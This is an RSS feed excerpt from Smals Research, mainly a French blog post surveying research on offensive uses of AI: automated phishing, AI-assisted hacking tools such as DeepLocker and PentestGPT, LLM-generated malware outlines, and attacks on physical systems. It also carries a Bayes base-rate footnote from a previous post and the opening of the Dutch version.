<p>Instinctivement, beaucoup diraient « 99,9%. » Pourtant, si l’on dénote <em><strong>I</strong></em> la variable aléatoire correspondant à une intrusion, et <em><strong>A</strong></em>, celle relative à une alerte, il est possible de réécrire les hypothèses ci-dessus de la manière suivante&nbsp;: si <em><strong>P</strong></em>(<em><strong>I</strong></em>)=100/1.000.000, <em><strong>P</strong></em>(<em><strong>A</strong></em>│<em><strong>I</strong></em>)=0,999, et <em><strong>P</strong></em>(¬<em><strong>A</strong></em>│¬<em><strong>I</strong></em>)=0,999, alors quelle est la valeur de <em><strong>P</strong></em>(<em><strong>I</strong></em>|<em><strong>A</strong></em>)&nbsp;? Le théorème de Bayes, nous donne&nbsp;: <em><strong>P</strong></em>(<em><strong>I</strong></em>│<em><strong>A</strong></em>)=<em><strong>P</strong></em>(<em><strong>I</strong></em>)⋅<em><strong>P</strong></em>(<em><strong>A</strong></em>|<em><strong>I</strong></em>)/<em><strong>P</strong></em>(<em><strong>A</strong></em>) avec <em><strong>P</strong></em>(<em><strong>A</strong></em>)=<em><strong>P</strong></em>(<em><strong>I</strong></em>)⋅<em><strong>P</strong></em>(<em><strong>A</strong></em>│<em><strong>I</strong></em>)+<em><strong>P</strong></em>(¬<em><strong>I</strong></em>)⋅<em><strong>P</strong></em>(<em><strong>A</strong></em>|¬<em><strong>I</strong></em>) et <em><strong>P</strong></em>(<em><strong>A</strong></em>│¬<em><strong>I</strong></em>)=1−<em><strong>P</strong></em>(¬<em><strong>A</strong></em>│¬<em><strong>I</strong></em>)=0,001. Ce qui conduit à 9,08% de probabilité que l’alerte donnée soit effectivement une intrusion et non 99,9%&nbsp;!</p>
<p><a href="#_ftnref9" name="_ftn9"><sup>9</sup></a> Une méthode non-paramétrique d’estimation de la densité de probabilité d’une variable aléatoire</p>
<p><a href="#_ftnref10" name="_ftn10"><sup>10</sup></a> <a href="https://www.paloaltonetworks.com/blog/security-operations/using-chatgpt-in-cortex-xsoar/" target="_blank" rel="noopener">https://www.paloaltonetworks.com/blog/security-operations/using-chatgpt-in-cortex-xsoar/</a></p>
<p><a href="#_ftnref11" name="_ftn11"><sup>11</sup></a> <a href="https://falconllm.tii.ae/" target="_blank" rel="noopener">https://falconllm.tii.ae/</a></p>
<p>_________________________<br data-rich-text-line-break="true" /><br data-rich-text-line-break="true" /><em>Ce post est une contribution individuelle de Fabien A. P. Petitcolas, spécialisé en sécurité informatique chez Smals Research. Cet article est écrit en son nom propre et n&#8217;impacte en rien le point de vue de Smals.</em></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>L&#8217;IA offensive</title>
		<link>https://www.smalsresearch.be/lia-offensive/</link>
		
		<dc:creator><![CDATA[Fabien A. P. Petitcolas]]></dc:creator>
		<pubDate>Mon, 19 Feb 2024 13:00:00 +0000</pubDate>
				<category><![CDATA[[FR]]]></category>
		<category><![CDATA[Blog post]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Machine Learning]]></category>
		<category><![CDATA[Security]]></category>
		<guid isPermaLink="false">/?p=19998</guid>

					<description><![CDATA[Dans cet article, nous traiterons de l’utilisation de l’IA pour faciliter les attaques contre des systèmes informatiques. En particulier, nous détaillerons comment l’IA pourrait modifier ou modifie déjà plusieurs vecteurs d’attaques.]]></description>
										<content:encoded><![CDATA[
<p><a href="/offensieve-ai/"><em>Nederlandstalige versie</em></a></p>



<p>La plupart des publications traitant «&nbsp;d’intelligence&nbsp;» artificielle (IA) et s’intéressant à la sécurité et aux attaques, se concentrent sur l’étude des attaques touchant les algorithmes d’apprentissage automatique (voir p. ex.&nbsp;<a href="#_ref1">[1]</a>) et les défenses contre de telles attaques. Par exemple, les attaques malveillantes traditionnelles sur les systèmes d’IA se produisent lorsqu’un adversaire manipule les données d’entrée pour tromper les algorithmes d’apprentissage automatique, entraînant ainsi une mauvaise classification<a href="#_ftn1" name="_ftnref1"><sup>1</sup></a>.</p>



<p>Néanmoins, un nombre significatif d’articles étudient aussi l’IA en tant qu’arme possible contre les systèmes d’information&nbsp;– permettant notamment des attaques potentiellement plus rapides, à plus grande échelle et d’une plus large portée&nbsp;– et en tant qu’outil permettant d’améliorer des vecteurs d’attaque existants.</p>



<p>Dans un <a href="/lia-en-cybersecurite/">article précédent</a>, nous avons brièvement expliqué ce qui se cache derrière le terme «&nbsp;d’intelligence artificielle&nbsp;» en décrivant quelques techniques de base utilisées en cybersécurité. Dans cet article, nous traiterons de l’utilisation de l’IA pour faciliter les attaques contre des systèmes informatiques. En particulier, nous détaillerons comment l’IA pourrait modifier ou modifie déjà plusieurs vecteurs d’attaques.</p>



<h1 class="wp-block-heading">Prévisions pessimistes</h1>



<p>Dès 2018, Brundage et al.&nbsp;<a href="#_ref2">[2]</a> ont fait remarquer que l’utilisation croissante des capacités de l’IA impliquerait trois changements dans le paysage des menaces&nbsp;:</p>



<ul class="wp-block-list">
<li>Une <strong>expansion des menaces existantes</strong>: l’IA pourrait permettre de réduire le coût des attaques en réduisant la main-d’œuvre nécessaire mais aussi d’atteindre un plus large éventail de cibles potentielles.</li>



<li>Une <strong>introduction de nouvelles menaces</strong>: les systèmes d’IA pourraient effectuer des tâches habituellement irréalisables pour un humain.</li>



<li>Un <strong>changement du caractère typique des menaces</strong>: les attaques permises par l’utilisation de l’IA pourraient devenir plus efficaces, plus finement ciblées et plus difficiles à attribuer.</li>
</ul>



<p>Ces prévisions sont corroborées par un rapport récent du centre national de cybersécurité britannique (NCSC) qui prévoit une augmentation du nombre et de l’efficacité des menaces de cybersécurité dues à l’IA&nbsp;<a href="#_ref3">[3]</a>.</p>



<p>Par exemple, l’accès facile à des <a href="/lia-en-cybersecurite/#LLM">modèles massifs de langage</a> pourrait permettre à des adversaires de contourner leurs propres limites en ressources, compétences et/ou connaissances. Par ailleurs, une utilisation incontrôlée d’applications d’IA dans des projets internes à une organisation ou par des employés peu avertis, pourrait créer de nouvelles surfaces d’attaques et occasionner des fuites de données personnelles, de propriété intellectuelle ou d’informations confidentielles.</p>



<h1 class="wp-block-heading">Hameçonnage et ingénierie sociale</h1>



<p>Dès 1966, avec ELIZA, l’un des premiers agents conversationnels, on découvrait que l’humain pouvait se faire tromper par la machine&nbsp;<a href="#_ref4">[4]</a>. Le traitement du langage naturel est un cas d’utilisation de l’IA où le texte brut est la source de données à partir de laquelle les modèles sont extraits<a href="#_ftn2" name="_ftnref2"><sup>2</sup></a>. Le traitement du langage a été utilisé avec succès pour de nombreuses applications. La détection de courriels non désirés en est un exemple tout comme l’inverse, le contournement des filtres de protection antispam (p. ex.&nbsp;<a href="#_ref5">[5]</a>).</p>



<p>L’hameçonnage est particulièrement adapté à cette dernière approche, car des modèles de texte peuvent être utilisés pour identifier les sujets qui intéressent la cible et générer des phrases auxquelles la cible pourrait répondre. Par exemple, dans&nbsp;<a href="#_ref6">[6]</a>, les auteurs utilisent un modèle de Markov et un réseau de neurones récurrents afin de démontrer la possibilité d’automatiser la génération de messages utilisés dans un processus d’hameçonnage sur Twitter&nbsp;: l’outil apprend à prédire le mot suivant à partir du contexte précédent dans l’historique des publications de la cible. Chaque message est donc adapté à une cible particulière augmentant ainsi la précision de l’attaque.</p>



<p>Étant donnée la capacité des <a href="/lia-en-cybersecurite/#LLM">modèles massifs de langages</a> à mieux «&nbsp;comprendre&nbsp;» le contexte, à mieux imiter le texte humain (parfois même avec moins d’erreurs&nbsp;<a href="#_ref7">[7]</a><a href="#_ftn3" name="_ftnref3"><sup>3</sup></a>), on constate que de tels outils sont déjà utilisés pour faciliter l’écriture, avec le ton adéquat, de courriels plausibles provenant de collègues, amis, familles ou site populaires de commerce en ligne, éventuellement en fonction d’informations glanées sur les réseaux sociaux&nbsp;<a href="#_ref8">[8]</a> (voir «&nbsp;<a href="#Annexe">Annexe&nbsp;– Génération de courriels d’hameçonnage</a>&nbsp;»). Pire, il est aujourd’hui possible, sans connaissances importantes en sécurité, d’utiliser ChatGPT pour générer non seulement des courriels d’hameçonnage mais aussi le site web correspondant&nbsp;<a href="#_ref9">[9]</a>. Cela est d’autant plus inquiétant lorsque l’on sait que 94&nbsp;% des logiciels malveillants détectés sont toujours envoyés par courriel&nbsp;<a href="#_ref10">[10]</a>.</p>



<p>Un autre exemple de l’utilisation de l’IA pour faciliter les attaques d’hameçonnage est DeepFish&nbsp;<a href="#_ref11">[11]</a>. Il s’agit d’un logiciel qui produit de nouvelles adresses web synthétiques d’hameçonnage en apprenant des modèles à partir des adresses web les plus efficaces dans les attaques historiques<a href="#_ftn4" name="_ftnref4"><sup>4</sup></a>. Ces adresses peuvent ensuite être utilisées dans des courriels d’hameçonnage ou d’autres canaux comme par exemple des publicités trompeuses. Peu après le lancement de Bing Chat, Microsoft a, sans grande surprise, ajouté la possibilité d’introduire des publicités dans les conversations. Malheureusement, les publicités comportent un risque inhérent et pourraient amener des utilisateurs à la recherche de téléchargements de logiciels, à visiter des sites malveillants et à installer des logiciels malveillants directement à partir d’une conversation sur Bing Chat <a href="#_ref12">[12]</a>.</p>



<h1 class="wp-block-heading">«&nbsp;Hacking&nbsp;» automatique</h1>



<p>L’IA permet d’exécuter des attaques à la vitesse de la machine. Par exemple, Deephack&nbsp;<a href="#_ref13">[13]</a> est un agent logiciel de quelques centaines de lignes de Python qui apprend à s’introduire dans des applications Web à l’aide d’un réseau neuronal, d’essais et d’erreurs. Il apprend à exploiter plusieurs types de vulnérabilités, ouvrant potentiellement la porte à une multitude de nouveaux systèmes de piratage.</p>



<p>DeepLocker<a href="#_ftn5" name="_ftnref5"><sup>5</sup></a> va plus loin en dissimulant ses intentions malveillantes et en s’activant pour des cibles spécifiques. Afin de décider si la machine où il est exécuté, est une cible ou pas, DeepLocker utilise un réseau de neurones artificiels complexe<a href="#_ftn6" name="_ftnref6"><sup>6</sup></a> à la place d&#8217;une simple liste de règles. Cela empêche les outils analysant statiquement et dynamiquement le logiciel de détecter la présence de code malveillant<a href="#_ftn7" name="_ftnref7"><sup>7</sup></a>. DeepLocker utilise également un autre réseau de neurones afin de générer une clé permettant de chiffrer ou déchiffrer la partie malveillante de son code afin de rendre celui-ci plus difficile à détecter.</p>



<p>Certaines procédures de « hacking » pourraient être simplifiées et accélérées grâce à l’utilisation de modèles génératifs. Des personnes malveillantes pourraient par exemple avoir recours à des outils comme PentestGPT<a href="#_ftn8" name="_ftnref8"><sup>8</sup></a>. Cet outil permet en effet, d’aider à gérer différentes tâches d’un processus de test de pénétration, comme l’utilisation d’outils spécifiques (notamment utilisant des commandes avec des options complexes souvent difficiles pour un humain) et la suggestion d’étapes à suivre&nbsp;<a href="#_ref14">[14]</a>. Selon ses auteurs il permet même de donner une «&nbsp;<em>intuition</em> » sur ce qu’il convient de faire dans un scénario d’intrusion donné. Il manque cependant de recommandations efficaces pour pouvoir accomplir les tâches de manière indépendante et il n’est pas capable de maintenir une compréhension cohérente du scénario de test. Mais Fang et al. ont montré que des agents alimentés par des modèles massifs de langage tel que ChatGPT peuvent errer par eux-mêmes sur le Web et s’introduire dans des applications Web boguées sans être surveillés <a href="#_ref15">[15]</a>.</p>



<p>Enfin, des outils d’IA générative entrainés sur des bases de données de vulnérabilités suffisamment larges, pourraient également être utilisés pour automatiser l’analyse de code afin d’identifier des vulnérabilités exploitables, mais les coûts de création de tels modèles sont élevés.</p>



<h1 class="wp-block-heading">Génération de charge utile et de code malveillant</h1>



<p>Dans le contexte d’une cyberattaque, la charge utile est la composante de l’attaque qui cause le préjudice (p. ex. effacement de fichiers). Elle peut être contenue dans un virus ou un ver informatique, une pièce jointe ou encore une requête transférée à une base de données SQL. Selon Gupta et al.&nbsp;<a href="#_ref16">[16]</a>, un outil d’IA générative pourrait être utilisé pour générer des charges utiles, et dans certains cas, de telle façon qu’elles ne puissent pas être détectées par un pare-feu d’applications Web («&nbsp;Web Application Firewall (WAF)&nbsp;»).</p>



<p>Un outil d’IA générative pourrait aussi être utilisé pour faciliter l’écriture de logiciels malveillants ou de rançongiciels&nbsp;: Guptal et al.&nbsp;<a href="#_ref16">[16]</a> ont conduit différents tests avec ChatGPT en le convainquant notamment de fournir des exemples de code de différents logiciels malveillants tels que NotPetya<a href="#_ftn9" name="_ftnref9"><sup>9</sup></a>, REvil<a href="#_ftn10" name="_ftnref10"><sup>10</sup></a>, Ryuk<a href="#_ftn11" name="_ftnref11"><sup>11</sup></a> ou WannaCry<a href="#_ftn12" name="_ftnref12"><sup>12</sup></a>. Les résultats ne sont pas directement utilisables, mais fournissent une structure de haut niveau du code, plutôt évidente pour toute personne ayant déjà programmé, mais qui peut laisser imaginer des améliorations importantes dans les années à venir. Des tests similaires ont aussi été réalisés, avec des résultats similaires, pour des virus exploitant des vulnérabilités telles que Meltdown<a href="#_ftn13" name="_ftnref13"><sup>13</sup></a>, RowHammer<a href="#_ftn14" name="_ftnref14"><sup>14</sup></a> et Spectre<a href="#_ftn15" name="_ftnref15"><sup>15</sup></a>.</p>



<p>Hutchins&nbsp;<a href="#_ref17">[17]</a> émet cependant de sérieux doutes sur la possibilité de générer des logiciels malveillants grâce à l’IA et en particulier grâce à des outils comme ChatGPT qui sont loin d’être capable de créer des logiciels entièrement fonctionnels mais pourraient, au mieux, fournir de petites briques difficilement assemblables. Il fait également valoir que ce code généré par l’IA existe déjà sur Internet.</p>



<h1 class="wp-block-heading">Attaques des systèmes physiques</h1>



<p>Enfin, si l’on prend comme hypothèse que les systèmes physiques (p. ex. un système de contrôle du refroidissement) sont moins sécurisés que l’infrastructure informatique cible et sont relativement plus faciles à exploiter, alors on peut envisager d’utiliser un logiciel malveillant afin d’attaquer indirectement une infrastructure informatique par le biais du système physique, en déguisant les actions malveillantes en défaillances accidentelles (p. ex. une surchauffe simulée conduisant à un arrêt d’urgence bien réel). C’est ce que montrent Chung et al.&nbsp;<a href="#_ref18">[18]</a>. Leur outil apprend automatiquement des stratégies d’attaque à partir des mesures collectées par le système physique.</p>



<h1 class="wp-block-heading">Analyse des cyberattaques utilisant l’IA</h1>



<p>Afin de permettre aux ingénieurs en sécurité d’étudier efficacement la classification des menaces dues à l’IA et leur impact et de mieux comprendre la stratégie des attaquants, Nektaria et al.&nbsp;<a href="#_ref19">[19]</a> proposent un cadre d’analyse des cyberattaques tirant parti de l’IA. Il est basé sur le cadre existant et très répandu «&nbsp;Cyber Kill Chain&nbsp;» mis au point par Lockheed Martin et est formé de trois niveaux&nbsp;:</p>



<ul class="wp-block-list">
<li><strong>Étapes de l’attaques et objectifs</strong>: ce premier niveau permet de décrire quand un attaquant peut atteindre ses objectifs malveillants en fonction du cycle de vie de la cyberattaque. Il permet de représenter l’intention de l’attaquant et le type de technique d’IA utilisée comme outil pour mener les actions malveillantes, en fonction de chaque phase du cycle de vie de la cyberattaque.</li>



<li><strong>Impact et classification de l’IA malveillante</strong>: ce deuxième niveau est une classification basée sur l’impact de l’utilisation malveillante des techniques d’IA, qui montre son impact potentiel en fonction du stade d’attaque appliqué.</li>



<li><strong>Classification des méthodes de défense&nbsp;</strong>: la défense contre les cyberattaques basées sur l’IA ne peut pas se faire avec une solution simple ou un seul outil. Il est nécessaire d’adopter une approche défensive approfondie tout au long du cycle de vie des cyberattaques afin de lutter contre&nbsp;«&nbsp;l’intelligence&nbsp;» des nouvelles méthodes.</li>
</ul>



<h1 class="wp-block-heading">Conclusion</h1>



<p>À travers les exemples donnés précédemment, l’IA apparait principalement comme un nouvel outil de «&nbsp;productivité&nbsp;» pour des attaquants professionnels (ou pas) déjà bien motivés. La pire menace que l’IA pourrait faire peser sur la sécurité serait la découverte à grande échelle de classes d’attaques entièrement nouvelles. Cependant, rien ne prouve qu’une telle découverte soit plus probable que celle faite par des acteurs humains.</p>



<p>Néanmoins, de nombreux problèmes restent en suspens quant à la manière de prévenir et d&#8217;atténuer ces menaces avancées, mais une bonne analyse des menaces avec un cadre approprié est un bon point de départ. De plus, nous pensons qu’une manière efficace de lutter contre les adversaires tirant partie de l’IA sera également d’utiliser l’IA afin d’être compétitif en termes de portée, de vitesse et d&#8217;échelle. Comme nous le verrons dans un dernier article sur le sujet, l’IA pourrait en effet contribuer à l&#8217;automatisation de tâche de cyberdéfense, telles que l’évaluation de vulnérabilités, la détection d’intrusions, la réponse à des incidents et le traitement de renseignements sur les menaces.</p>



<h1 class="wp-block-heading">Références</h1>



<p><a name="_ref1"></a>[1]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; N. Papernot, P. McDaniel, S. Jha, M. Fredrikson, Z. B. Celik, et A. Swami, «&nbsp;The limitations of deep learning in adversarial settings&nbsp;». arXiv, 23 novembre 2015. Consulté le: 27 octobre 2023. [En ligne]. Disponible sur: <a href="https://arxiv.org/abs/1511.07528" target="_blank" rel="noopener">http://arxiv.org/abs/1511.07528</a></p>



<p><a name="_ref2"></a>[2]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; M. Brundage <em>et al.</em>, «&nbsp;The malicious use of artificial intelligence: forecasting, prevention and mitigation&nbsp;», févr. 2018.</p>



<p><a name="_ref3"></a>[3]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; «&nbsp;The near-term impact of AI on the cyber threat&nbsp;», National Cyber Security Centre, janv. 2024. Consulté le: 27 janvier 2024. [En ligne]. Disponible sur: https://www.ncsc.gov.uk/pdfs/report/impact-of-ai-on-cyber-threat.pdf</p>



<p><a name="_ref4"></a>[4]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; J. Weizenbaum, «&nbsp;ELIZA—a computer program for the study of natural language communication between man and machine&nbsp;», <em>Commun. ACM</em>, vol. 9, n<sup>o</sup> 1, p. 36‑45, janv. 1966, doi: <a href="https://doi.org/10.1145/365153.365168" target="_blank" rel="noopener">https://doi.org/10.1145/365153.365168</a>.</p>



<p><a name="_ref5"></a>[5]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; S. Palka et D. McCoy, «&nbsp;Fuzzing e-mail filters with generative grammars and n-gram analysis&nbsp;», in <em>WOOT’15: Proceedings of the 9th USENIX Conference on Offensive Technologies</em>, août 2015.</p>



<p><a name="_ref6"></a>[6]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; J. Seymour et P. Tully, «&nbsp;Weaponizing data science for social engineering: Automated E2E spear phishing on Twitter&nbsp;», présenté à Black Hat USA, 2016, p. 1‑8.</p>



<p><a name="_ref7"></a>[7]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; M. Heikkilä, «&nbsp;How to spot AI-generated text&nbsp;», MIT Technology Review. Consulté le: 11 octobre 2023. [En ligne]. Disponible sur: <a href="https://www.technologyreview.com/2022/12/19/1065596/how-to-spot-ai-generated-text/" target="_blank" rel="noopener">https://www.technologyreview.com/2022/12/19/1065596/how-to-spot-ai-generated-text/</a></p>



<p><a name="_ref8"></a>[8]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; J. Chapman, «&nbsp;Phishing threat trends report &#8211; From pretexting to payloads, how have phishing attacks evolved in 2023?&nbsp;», egress, oct. 2023. Consulté le: 7 novembre 2023. [En ligne]. Disponible sur: <a href="https://www.egress.com/media/mq4kwitu/egress_phishing_threat_trends_report.pdf" target="_blank" rel="noopener">https://www.egress.com/media/mq4kwitu/egress_phishing_threat_trends_report.pdf</a></p>



<p><a name="_ref9"></a>[9]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; S. S. Roy, K. V. Naragam, et S. Nilizadeh, «&nbsp;Generating phishing attacks using ChatGPT&nbsp;». arXiv, 8 mai 2023. Consulté le: 17 octobre 2023. [En ligne]. Disponible sur: <a href="https://arxiv.org/abs/2305.05133" target="_blank" rel="noopener">http://arxiv.org/abs/2305.05133</a></p>



<p><a name="_ref10"></a>[10]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; «&nbsp;Preparing for AI-enabled cyberattacks&nbsp;», MIT Technology Review, janv. 2021.</p>



<p><a name="_ref11"></a>[11]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; A. Correa Bahnsen, «&nbsp;DeepPhish: Simulating malicious AI&nbsp;», 6 décembre 2018.</p>



<p><a name="_ref12"></a>[12]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; J. Segura, «&nbsp;Malicious ad served inside Bing’s AI chatbot&nbsp;», Malwarebytes. Consulté le: 7 novembre 2023. [En ligne]. Disponible sur: <a href="https://www.malwarebytes.com/blog/threat-intelligence/2023/09/malicious-ad-served-inside-bing-ai-chatbot" target="_blank" rel="noopener">https://www.malwarebytes.com/blog/threat-intelligence/2023/09/malicious-ad-served-inside-bing-ai-chatbot</a></p>



<p><a name="_ref13"></a>[13]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; D. Petro et B. Morris, «&nbsp;Weaponizing machine learning: Humanity was overrated anyway&nbsp;», présenté à DEF CON 25, 10 août 2017. [En ligne]. Disponible sur: <a href="https://www.youtube.com/watch?v=wbRx18VZlYA" target="_blank" rel="noopener">https://www.youtube.com/watch?v=wbRx18VZlYA</a></p>



<p><a name="_ref14"></a>[14]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; G. Deng <em>et al.</em>, «&nbsp;PentestGPT: An LLM-empowered automatic penetration testing tool&nbsp;». arXiv, 13 août 2023. Consulté le: 8 novembre 2023. [En ligne]. Disponible sur: <a href="https://arxiv.org/abs/2308.06782" target="_blank" rel="noopener">http://arxiv.org/abs/2308.06782</a></p>



<p><a name="_ref15"></a>[15] &nbsp;&nbsp;&nbsp;&nbsp; R. Fang, R. Bindu, A. Gupta, Q. Zhan, et D. Kang, «&nbsp;LLM Agents can Autonomously Hack Websites&nbsp;». arXiv, 6 février 2024. Consulté le: 19 février 2024. [En ligne]. Disponible sur: <a href="https://arxiv.org/abs/2402.06664" target="_blank" rel="noopener">http://arxiv.org/abs/2402.06664</a></p>



<p><a name="_ref16"></a>[16]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; M. Gupta, C. Akiri, K. Aryal, E. Parker, et L. Praharaj, « From ChatGPT to ThreatGPT: Impact of generative AI in cybersecurity and privacy », <em>IEEE Access</em>, vol. 11, p. 80218‑80245, août 2023, doi: <a href="https://doi.org/10.1109/ACCESS.2023.3300381">10.1109/ACCESS.2023.3300381</a>.</p>



<p><a name="_ref17"></a>[17]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; M. Hutchins, « A realistic look at implications of ChatGPT for cybercrime », MalwareTech. Consulté le: 6 février 2024. [En ligne]. Disponible sur: <a href="https://malwaretech.com/2023/02/a-realistic-look-at-chatgpt-cybercrime.html" target="_blank" rel="noopener">https://malwaretech.com/2023/02/a-realistic-look-at-chatgpt-cybercrime.html</a></p>



<p><a name="_ref18"></a>[18]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; K. Chung, Z. T. Kalbarczyk, et R. K. Iyer, « Availability attacks on computing systems through alteration of environmental control: smart malware approach », in <em>Proceedings of the 10th ACM/IEEE International Conference on Cyber-Physical Systems</em>, Montreal Quebec Canada: ACM, avr. 2019, p. 1‑12. doi: 10.1145/3302509.3311041.</p>



<p><a name="_ref19"></a>[19]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; N. Kaloudi et J. Li, « The AI-based cyber threat landscape: A survey », <em>ACM Comput. </em><em>Surv.</em>, vol. 53, n<sup>o</sup> 1, p. 1‑34, févr. 2020, doi: <a href="https://dl.acm.org/doi/abs/10.1145/3372823" target="_blank" rel="noopener">https://dl.acm.org/doi/abs/10.1145/3372823</a>.</p>



<h1 class="wp-block-heading"><a name="Annexe"></a>Annexe&nbsp;– Génération de courriels d’hameçonnage</h1>



<p>Voici quelques exemples de génération de courriels d’hameçonnage avec ChatGPT (généré avec la version 4.0 le 9 février 2024)&nbsp;:</p>



<p><a href="/wp-content/uploads/2024/02/ChatGPT-sample-1-FR.png"><img loading="lazy" decoding="async" class="aligncenter wp-image-20011" src="/wp-content/uploads/2024/02/ChatGPT-sample-1-FR.png" alt="Exemple de génération de courriels d’hameçonnage avec la version 4.0 de ChatGPT" width="600" height="993"></a></p>



<p><a href="/wp-content/uploads/2024/02/ChatGPT-sample-2-FR.png"><img loading="lazy" decoding="async" class="aligncenter wp-image-20013" src="/wp-content/uploads/2024/02/ChatGPT-sample-2-FR.png" alt="Exemple de génération de courriels d’hameçonnage avec la version 4.0 de ChatGPT" width="600" height="993"></a></p>



<p><a href="/wp-content/uploads/2024/02/ChatGPT-sample-3-FR.png"><img loading="lazy" decoding="async" class="aligncenter wp-image-20015" src="/wp-content/uploads/2024/02/ChatGPT-sample-3-FR.png" alt="Exemple de génération de courriels d’hameçonnage avec la version 4.0 de ChatGPT" width="600" height="1067"></a></p>



<h1 class="wp-block-heading">Notes</h1>



<p><a href="#_ftnref1" name="_ftn1"><sup>1</sup></a> &nbsp; La base de connaissance ATLAS de MITRE (<a href="https://atlas.mitre.org/" target="_blank" rel="noopener">https://atlas.mitre.org/</a>) recense un nombre important de vulnérabilités des systèmes basés sur l’IA. L’utilisation de l’IA augmente la surface d’attaque des systèmes existants.</p>



<p><a href="#_ftnref2" name="_ftn2"><sup>2</sup></a> &nbsp; Aujourd’hui de tels modèles sont capables de mémoriser l’intégralité de Wikipédia, qui est le résultat des travaux cumulés de nombreux bénévoles et experts dans leurs domaines respectifs, sur une myriade de sujets divers.</p>



<p><a href="#_ftnref3" name="_ftn3"><sup>3</sup></a> &nbsp; Qui n’a pas déjà reçu un courriel d’hameçonnage plein de fautes d’orthographe ou de grammaire, le rendant facilement identifiable&nbsp;?</p>



<p><a href="#_ftnref4" name="_ftn4"><sup>4</sup></a> &nbsp; La charge la plus fréquemment utilisée pour les courriels d’hameçonnage sont les adresses web selon un rapport récent de la société egress&nbsp;<a href="#_ref8">[8]</a>.</p>



<p><a href="#_ftnref5" name="_ftn5"><sup>5</sup></a> &nbsp; <a href="https://www.blackhat.com/us-18/briefings/schedule/#deeplocker---concealing-targeted-attacks-with-ai-locksmithing-11549" target="_blank" rel="noopener">https://www.blackhat.com/us-18/briefings/schedule/#deeplocker&#8212;concealing-targeted-attacks-with-ai-locksmithing-11549</a></p>



<p><a href="#_ftnref6" name="_ftn6"><sup>6</sup></a> &nbsp; Un exemple donné par les auteurs de DeepLocker est l’utilisation de la reconnaissance faciale de l’utilisateur pour cibler des personnes particulières avec l’attaque. Le choix d’exécuter du code malveillant pourrait aussi être lié au comportement de l’utilisateur, de l’environnement logiciel, etc.</p>



<p><a href="#_ftnref7" name="_ftn7"><sup>7</sup></a> &nbsp; D’une certaine façon l’exemple est similaire aux voitures du groupe Volkswagen qui changeaient de comportement lors des cycles d’homologation et dont le scandale a été révélé en 2015.</p>



<p><a href="#_ftnref8" name="_ftn8"><sup>8</sup></a> <a href="https://github.com/GreyDGL/PentestGPT" target="_blank" rel="noopener">https://github.com/GreyDGL/PentestGPT</a></p>



<p><a href="#_ftnref9" name="_ftn9"><sup>9</sup></a> &nbsp; <a href="https://fr.wikipedia.org/wiki/Cyberattaque_NotPetya" target="_blank" rel="noopener">https://fr.wikipedia.org/wiki/Cyberattaque_NotPetya</a></p>



<p><a href="#_ftnref10" name="_ftn10"><sup>10</sup></a> <a href="https://fr.wikipedia.org/wiki/REvil" target="_blank" rel="noopener">https://fr.wikipedia.org/wiki/REvil</a></p>



<p><a href="#_ftnref11" name="_ftn11"><sup>11</sup></a> <a href="https://fr.wikipedia.org/wiki/Ryuk_(logiciel)" target="_blank" rel="noopener">https://fr.wikipedia.org/wiki/Ryuk_(logiciel)</a></p>



<p><a href="#_ftnref12" name="_ftn12"><sup>12</sup></a> <a href="https://fr.wikipedia.org/wiki/WannaCry" target="_blank" rel="noopener">https://fr.wikipedia.org/wiki/WannaCry</a></p>



<p><a href="#_ftnref13" name="_ftn13"><sup>13</sup></a> <a href="https://fr.wikipedia.org/wiki/Meltdown_(vuln%C3%A9rabilit%C3%A9)" target="_blank" rel="noopener">https://fr.wikipedia.org/wiki/Meltdown_(vuln%C3%A9rabilit%C3%A9)</a></p>



<p><a href="#_ftnref14" name="_ftn14"><sup>14</sup></a> <a href="https://fr.wikipedia.org/wiki/Mart%C3%A8lement_de_m%C3%A9moire" target="_blank" rel="noopener">https://fr.wikipedia.org/wiki/Mart%C3%A8lement_de_m%C3%A9moire</a></p>



<p><a href="#_ftnref15" name="_ftn15"><sup>15</sup></a> <a href="https://fr.wikipedia.org/wiki/Spectre_(vuln%C3%A9rabilit%C3%A9)" target="_blank" rel="noopener">https://fr.wikipedia.org/wiki/Spectre_(vuln%C3%A9rabilit%C3%A9)</a></p>



<p>_________________________<br><em>Ce post est une contribution individuelle de Fabien A. P. Petitcolas, spécialisé en sécurité informatique chez Smals Research. Cet article est écrit en son nom propre et n&#8217;impacte en rien le point de vue de Smals.</em></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Offensieve AI</title>
		<link>https://www.smalsresearch.be/offensieve-ai/</link>
		
		<dc:creator><![CDATA[Fabien A. P. Petitcolas]]></dc:creator>
		<pubDate>Mon, 19 Feb 2024 13:00:00 +0000</pubDate>
				<category><![CDATA[[NL]]]></category>
		<category><![CDATA[Blog post]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Machine Learning]]></category>
		<category><![CDATA[Security]]></category>
		<guid isPermaLink="false">/?p=20020</guid>

					<description><![CDATA[In dit artikel kijken we naar het gebruik van AI om aanvallen op computersystemen te verge-makkelijken. We beschrijven in het bijzonder hoe AI verschillende aanvalsvectoren kan wijzi-gen of al wijzigt.]]></description>
										<content:encoded><![CDATA[
<p><a href="/lia-offensive/"><em>Version en français</em></a></p>



